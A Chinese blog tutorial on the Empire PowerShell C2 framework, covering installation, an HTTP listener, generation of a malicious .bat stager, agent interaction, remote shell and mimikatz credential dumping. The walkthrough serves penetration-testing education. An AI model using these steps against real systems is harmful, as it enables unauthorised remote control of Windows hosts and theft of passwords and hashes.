前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Empire框架指南(一)

Empire框架指南(一)

作者头像
逍遥子大表哥
发布2022-11-14 16:45:48
7370
发布2022-11-14 16:45:48
举报
文章被收录于专栏:kali blogkali blog

Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。

在kali中安装

在kali中安装很简单,我们只需执行下面命令即可。

代码语言:javascript
复制
sudo apt install powershell-empire

启动服务端

这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell服务端

代码语言:javascript
复制
powershell-empire server

启动Empire powershell 客户端

代码语言:javascript
复制
powershell-empire client

牛刀小试

Empire的使用方法与msf的方法相同,先设置监听,生成木马,然后监听反弹代理。

输入Listeners进入监听页面,uselistener设置监听模式,共有7种模式

  • dbx
  • http
  • http_foreign
  • http_hop
  • http_mapi
  • http_com
  • meterpreter

这里,我们以http模块为例:

代码语言:javascript
复制
uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行

现在配置完监听模块,我们来看看怎样生成shell.

使用windows/launcher_bat模块,来生成恶意shell。

代码语言:javascript
复制
usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行

执行完成上面的命令后,我们的恶意文件已经生成。格式为bat

双击运行后,我们可以看到已经成功得到了会话。输入agents可以查看连接上的计算机的详细信息。

连接设备

和msf一样,我们需要连接当前在线的设备。interact 设备name

代码语言:javascript
复制
interact V1T86EUN

运行help命令,可以看到具体的帮助文档。

由于命令比较多,这里我列举常用的一些命令

进入系统cmd

代码语言:javascript
复制
shell

使用内置的mimikatz抓取hash和密码

代码语言:javascript
复制
mimikatz

设备详细信息

代码语言:javascript
复制
info

总结

empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!


版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/2162439

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 在kali中安装
  • 启动服务端
  • 启动Empire powershell 客户端
  • 牛刀小试
  • 连接设备
  • 总结
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档